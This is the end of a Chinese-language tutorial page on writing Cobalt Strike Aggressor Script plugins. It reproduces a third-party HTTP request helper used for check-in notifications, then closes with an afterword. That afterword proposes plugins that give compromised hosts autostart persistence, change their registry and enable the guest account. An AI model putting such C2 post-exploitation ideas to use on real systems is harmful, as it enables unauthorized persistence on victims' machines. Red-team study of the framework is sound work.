</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>这样就完成了一个 Server酱 上线提示的操作</p> <p>这里我分享一个国外师傅打包好的请求方法：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment">#</span>
<span class="token comment"># Safe &amp; sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.</span>
<span class="token comment"># Works with HTTP &amp; HTTPS, GET/POST/etc. + redirections.</span>
<span class="token comment">#</span>
<span class="token comment"># Author: Mariusz B. / mgeeky, '20</span>
<span class="token comment"># &lt;mb [at] binary-offensive.com&gt;</span>
<span class="token comment">#</span>

<span class="token function">import</span> java.net.URLEncoder<span class="token punctuation">;</span>
<span class="token function">import</span> java.io.BufferedReader<span class="token punctuation">;</span>
<span class="token function">import</span> java.io.DataOutputStream<span class="token punctuation">;</span>
<span class="token function">import</span> java.io.InputStreamReader<span class="token punctuation">;</span>
<span class="token function">import</span> java.net.HttpURLConnection<span class="token punctuation">;</span>
<span class="token function">import</span> java.net.URL<span class="token punctuation">;</span>


<span class="token comment">#</span>
<span class="token comment"># httpRequest($method, $url, $body);</span>
<span class="token comment">#</span>
sub httpRequest <span class="token punctuation">{</span>
    <span class="token variable">$method</span> <span class="token operator">=</span> <span class="token variable">$1</span><span class="token punctuation">;</span>
    <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token variable">$2</span><span class="token punctuation">;</span>
    <span class="token variable">$body</span> <span class="token operator">=</span> <span class="token variable">$3</span><span class="token punctuation">;</span>
    <span class="token variable">$n</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>

    if<span class="token punctuation">(</span>size<span class="token punctuation">(</span>@_<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">4</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$n</span> <span class="token operator">=</span> <span class="token variable">$4</span><span class="token punctuation">;</span> <span class="token punctuation">}</span>

    <span class="token variable">$bodyLen</span> <span class="token operator">=</span> strlen<span class="token punctuation">(</span><span class="token variable">$body</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$maxRedirectsAllowed</span> <span class="token operator">=</span> <span class="token number">10</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$n</span> <span class="token operator">&gt;</span> <span class="token variable">$maxRedirectsAllowed</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        warn<span class="token punctuation">(</span><span class="token string">&quot;Exceeded maximum number of redirects: <span class="token variable">$method</span> <span class="token variable">$url</span> &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token builtin class-name">return</span> <span class="token string">&quot;&quot;</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    try
    <span class="token punctuation">{</span>
        <span class="token variable">$urlobj</span> <span class="token operator">=</span> <span class="token punctuation">[</span>new java.net.URL: <span class="token variable">$url</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$con</span> <span class="token operator">=</span> <span class="token variable">$null</span><span class="token punctuation">;</span>
        <span class="token variable">$con</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$urlobj</span> openConnection<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestMethod: <span class="token variable">$method</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setInstanceFollowRedirects: true<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestProperty: <span class="token string">&quot;Accept&quot;</span>, <span class="token string">&quot;*/*&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestProperty: <span class="token string">&quot;Cache-Control&quot;</span>, <span class="token string">&quot;max-age=0&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestProperty: <span class="token string">&quot;Connection&quot;</span>, <span class="token string">&quot;keep-alive&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestProperty: <span class="token string">&quot;User-Agent&quot;</span>, <span class="token variable">$USER_AGENT</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

        if<span class="token punctuation">(</span><span class="token variable">$bodyLen</span> <span class="token operator">&gt;</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token punctuation">[</span><span class="token variable">$con</span> setDoOutput: true<span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token punctuation">[</span><span class="token variable">$con</span> setRequestProperty: <span class="token string">&quot;Content-Type&quot;</span>, <span class="token string">&quot;application/x-www-form-urlencoded&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token variable">$outstream</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$con</span> getOutputStream<span class="token punctuation">]</span><span class="token punctuation">;</span>
        if<span class="token punctuation">(</span><span class="token variable">$bodyLen</span> <span class="token operator">&gt;</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token punctuation">[</span><span class="token variable">$outstream</span> write: <span class="token punctuation">[</span><span class="token variable">$body</span> getBytes<span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token variable">$inputstream</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$con</span> getInputStream<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token punctuation">[</span>SleepUtils getIOHandle: <span class="token variable">$inputstream</span>, <span class="token variable">$outstream</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$responseCode</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$con</span> getResponseCode<span class="token punctuation">]</span><span class="token punctuation">;</span>

        <span class="token keyword">if</span><span class="token variable"><span class="token punctuation">((</span>$responseCode <span class="token operator">&gt;=</span> <span class="token number">301</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span>$responseCode <span class="token operator">&lt;=</span> <span class="token number">304</span><span class="token punctuation">))</span></span> <span class="token punctuation">{</span>
            <span class="token variable">$loc</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$con</span> getHeaderField: <span class="token string">&quot;Location&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token builtin class-name">return</span> httpRequest<span class="token punctuation">(</span><span class="token variable">$method</span>, <span class="token variable">$loc</span>, <span class="token variable">$body</span>, <span class="token variable">$n</span> + <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        @content <span class="token operator">=</span> readAll<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$response</span> <span class="token operator">=</span> <span class="token string">&quot;&quot;</span><span class="token punctuation">;</span>
        foreach <span class="token variable">$line</span> <span class="token punctuation">(</span>@content<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$response</span> .<span class="token operator">=</span> <span class="token variable">$line</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;<span class="token entity" title="\r">\r</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token keyword">if</span><span class="token variable"><span class="token punctuation">((</span>strlen<span class="token punctuation">(</span>$response<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token number">2</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span>right<span class="token punctuation">(</span>$response<span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span> eq &quot;\r\n&quot;<span class="token punctuation">))</span></span> <span class="token punctuation">{</span>
            <span class="token variable">$response</span> <span class="token operator">=</span> substr<span class="token punctuation">(</span><span class="token variable">$response</span>, <span class="token number">0</span>, strlen<span class="token punctuation">(</span><span class="token variable">$response</span><span class="token punctuation">)</span> - <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token builtin class-name">return</span> <span class="token variable">$response</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    catch <span class="token variable">$message</span>
    <span class="token punctuation">{</span>
       warn<span class="token punctuation">(</span><span class="token string">&quot;HTTP Request failed: <span class="token variable">$method</span> <span class="token variable">$url</span> : <span class="token variable">$message</span> &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
       printAll<span class="token punctuation">(</span>getStackTrace<span class="token punctuation">(</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
       <span class="token builtin class-name">return</span> <span class="token string">&quot;&quot;</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br><span class="line-number">63</span><br><span class="line-number">64</span><br><span class="line-number">65</span><br><span class="line-number">66</span><br><span class="line-number">67</span><br><span class="line-number">68</span><br><span class="line-number">69</span><br><span class="line-number">70</span><br><span class="line-number">71</span><br><span class="line-number">72</span><br><span class="line-number">73</span><br><span class="line-number">74</span><br><span class="line-number">75</span><br><span class="line-number">76</span><br><span class="line-number">77</span><br><span class="line-number">78</span><br><span class="line-number">79</span><br><span class="line-number">80</span><br><span class="line-number">81</span><br><span class="line-number">82</span><br><span class="line-number">83</span><br><span class="line-number">84</span><br></div></div><p>github链接：https://github.com/mgeeky/cobalt-arsenal/blob/master/httprequest.cna</p> <h1 id="后记">后记 <a href="#后记" class="header-anchor">#</a></h1> <p>关于脚本编写的官方文档到这里就结束了，后面是自定义报告和一些其他零碎的东西，C2插件的编写最主要的是 数据模型 和事件，我们需要将不同的事件和数据模型结合，产生不同的结果；例如我们如何让上线的主机直接添加自启动、修改注册表、激活guest用户等，都可以自己写插件实现，由于 Aggressor Script是基于Sleep脚本语言来写的，所以需要好好的阅读Sleep官方的文档。翻译内容可能会存在错误，还请各位师傅斧正</p> <h2 id="参考文档">参考文档 <a href="#参考文档" class="header-anchor">#</a></h2> <p>CS插件编写官方文档：https://www.cobaltstrike.com/help-scripting</p> <p>Sleep语法文档：http://sleep.dashnine.org/manual/index.html</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/intranet/Cobalt-Strike.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        Cobalt Strike
      </a></span> <span class="next"><a href="/knowledge/web/">
        分类简介
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/64.6bf3fede.js" defer></script>
  </body>
</html>